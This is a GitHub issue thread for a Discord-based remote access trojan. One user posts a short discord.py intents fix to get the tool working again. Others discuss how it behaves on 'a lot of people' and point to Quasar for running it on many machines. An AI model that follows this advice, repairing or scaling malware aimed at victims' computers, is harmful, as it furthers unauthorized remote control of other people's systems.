Discord-RAT icon indicating copy to clipboard operation
Discord-RAT copied to clipboard

How to fix the script

Open ege75753 opened this issue 2 years ago • 3 comments

Ok hello so the script does not work because of a discord update so im gonna tell u how to make it work

so in line 31 "i dont know the line perfect but it should say 'client ='"

so change that to the following code

intents = discord.Intents.default() client = discord.Client(intents=intents) intents.message_content = True bot = commands.Bot(command_prefix='!', intents=intents)

thats it you fixed the program hooray!

ege75753 avatar May 03 '23 19:05 ege75753

hey I got a question. is it bugging for you too when you have a lot of people? for me it is super buggy. image

THEKILERFRIEND avatar May 26 '23 13:05 THEKILERFRIEND

@THEKILERFRIEND if you wanna use it for a lot of people i suggest you dont use this one because it can launch commands on every machine on 1 channel so its kind if broken i suggest you to use Quasar https://github.com/quasar/Quasar for actually using this on a lot of poeple because it is really buggy when there is more then 1 client

ege75753 avatar May 28 '23 20:05 ege75753